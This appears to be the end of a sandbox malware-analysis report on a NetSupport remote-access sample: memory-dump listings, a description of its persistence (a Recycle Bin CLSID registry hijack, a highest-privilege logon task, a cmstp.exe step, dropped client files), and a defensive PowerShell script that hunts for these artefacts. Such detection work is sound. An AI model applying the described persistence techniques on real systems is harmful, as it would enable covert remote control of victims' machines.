          • memory/2944-159-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/2944-160-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

            Filesize

            64KB

          • memory/2944-184-0x0000000006EA0000-0x0000000006EE4000-memory.dmp

            Filesize

            272KB

          • memory/2944-233-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

            Filesize

            64KB

          • memory/2944-210-0x0000000007FA0000-0x0000000007FAA000-memory.dmp

            Filesize

            40KB

          • memory/2944-209-0x0000000007FC0000-0x0000000007FD2000-memory.dmp

            Filesize

            72KB

          • memory/2944-208-0x0000000007F50000-0x0000000007F5A000-memory.dmp

            Filesize

            40KB

          • memory/2944-193-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

            Filesize

            64KB

          • memory/2944-186-0x0000000007020000-0x0000000007096000-memory.dmp

            Filesize

            472KB

          • memory/2944-267-0x000000007EF70000-0x000000007EF80000-memory.dmp

            Filesize

            64KB

          • memory/2944-187-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

            Filesize

            64KB

          • memory/2944-191-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/2944-197-0x000000006E1F0000-0x000000006E544000-memory.dmp

            Filesize

            3.3MB

          • memory/2944-196-0x000000006E090000-0x000000006E0DC000-memory.dmp

            Filesize

            304KB

          • memory/2944-195-0x0000000007E20000-0x0000000007E52000-memory.dmp

            Filesize

            200KB

          • memory/2944-192-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

            Filesize

            64KB

          • memory/4572-183-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

            Filesize

            64KB

          • memory/4572-185-0x0000000007A40000-0x00000000080BA000-memory.dmp

            Filesize

            6.5MB

          • memory/4572-162-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

            Filesize

            64KB

          • memory/4572-189-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4572-161-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4572-163-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

            Filesize

            64KB

          • memory/4596-270-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4596-286-0x0000000002B20000-0x0000000002B30000-memory.dmp

            Filesize

            64KB

          • memory/4596-271-0x0000000002B20000-0x0000000002B30000-memory.dmp

            Filesize

            64KB

          • memory/4596-302-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4784-238-0x0000000004A60000-0x0000000004A70000-memory.dmp

            Filesize

            64KB

          • memory/4784-236-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4784-266-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/4784-249-0x0000000004A60000-0x0000000004A70000-memory.dmp

            Filesize

            64KB

          • memory/4784-237-0x0000000004A60000-0x0000000004A70000-memory.dmp

            Filesize

            64KB
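The process tree and the dropped-file list together describe what this run leaves on a host: a `shell\open\command` verb written by reg.exe under the Recycle Bin CLSID {645FF040-5081-101B-9F08-00AA002F954E}, a logon task named BackgroundCheck registered with RunLevel Highest, and the NetSupport client (client32.exe plus its DLLs, NSM.LIC and client32.ini) in %APPDATA%\IonicBaseband, with a CMSTP.inf left in %TEMP% by the cmstp.exe /au step. The hunting script below is an added example, not part of the report, that checks a host for exactly those artefacts; paths, task name and CLSID are taken from the tree and the SHA256 values from the list above. The NetSupport binaries are the vendor's own files, so a hash match only confirms which build is present; the drop location and the registry and task entries are what tie a host to this sample. Run it as the affected user; seeing tasks registered by other accounts needs an elevated prompt.

```powershell
# Added example (hunting helper, not from the report). Values below come from the analysis above.
$KnownHashes = @{
    'client32.exe' = '49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3'
    'PCICL32.DLL'  = '63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8'
    'HTCTL32.DLL'  = 'edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796'
    'client32.ini' = '4536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5'
    'NSM.LIC'      = '2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12'
}
$RecycleBinClsid = '{645FF040-5081-101B-9F08-00AA002F954E}'   # key hijacked by reg.exe in the tree
$TaskName        = 'BackgroundCheck'                           # Register-ScheduledTask -TaskName value
$DropDir         = Join-Path $env:APPDATA 'IonicBaseband'      # C:\Users\<user>\AppData\Roaming\IonicBaseband

function Find-NetSupportPersistence {
    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Recycle Bin CLSID verb hijack. reg.exe wrote HKCR, which is backed by
    #    HKLM\Software\Classes (elevated) or HKCU\Software\Classes; check both.
    foreach ($hive in 'HKLM:\Software\Classes', 'HKCU:\Software\Classes') {
        $key = "$hive\CLSID\$RecycleBinClsid\shell\open\command"
        if (Test-Path -Path $key) {
            $cmd = (Get-Item -Path $key).GetValue('')
            $findings.Add([pscustomobject]@{ Kind = 'RegistryHijack'; Detail = "$key = $cmd" })
        }
    }

    # 2. Logon task running with highest privileges from a user-writable path.
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    if ($task) {
        $exe = ($task.Actions | ForEach-Object Execute) -join ';'
        $findings.Add([pscustomobject]@{
            Kind   = 'ScheduledTask'
            Detail = "$TaskName -> $exe (RunLevel $($task.Principal.RunLevel))"
        })
    }

    # 3. Dropped NetSupport client. The files are legitimate vendor binaries, so the
    #    path is the discriminator; the hash tells you whether it is the same build.
    if (Test-Path -Path $DropDir) {
        foreach ($name in $KnownHashes.Keys) {
            $path = Join-Path $DropDir $name
            if (Test-Path -Path $path) {
                $hash  = (Get-FileHash -Path $path -Algorithm SHA256).Hash.ToLower()
                $match = if ($hash -eq $KnownHashes[$name]) { 'hash matches report' } else { "hash differs: $hash" }
                $findings.Add([pscustomobject]@{ Kind = 'DroppedFile'; Detail = "$path ($match)" })
            }
        }
    }

    # 4. Live client and the leftover .inf from the cmstp.exe /au step.
    Get-Process -Name client32 -ErrorAction SilentlyContinue | ForEach-Object {
        $findings.Add([pscustomobject]@{ Kind = 'Process'; Detail = "client32.exe PID $($_.Id) from $($_.Path)" })
    }
    $inf = Join-Path $env:TEMP 'CMSTP.inf'
    if (Test-Path -Path $inf) {
        $findings.Add([pscustomobject]@{ Kind = 'CmstpInf'; Detail = $inf })
    }

    return $findings
}

Find-NetSupportPersistence | Format-Table -AutoSize
```

An empty result does not clear a host that was only partially cleaned: the task and the registry verb each relaunch client32.exe on their own, so remediation has to remove the task, the `shell\open\command` key under both hives, and the IonicBaseband directory together.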